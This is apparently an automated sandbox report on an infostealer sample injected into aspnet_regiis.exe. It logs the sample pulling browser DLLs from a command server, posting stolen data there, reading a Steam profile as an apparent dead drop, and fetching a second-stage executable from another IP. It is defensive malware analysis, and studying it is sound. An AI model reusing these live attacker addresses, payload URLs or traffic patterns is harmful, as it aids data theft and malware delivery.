                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 98177Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00406963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: AntiVirusProductWindows Defender{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}windowsdefender://%ProgramFiles%\Windows Defender\MsMpeng.exeThu, 05 Oct 2023 07:18:28 GMTm/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: m/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe=----FBKFCFBFIDGCGDHJDBKFen
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
                          Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                          Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
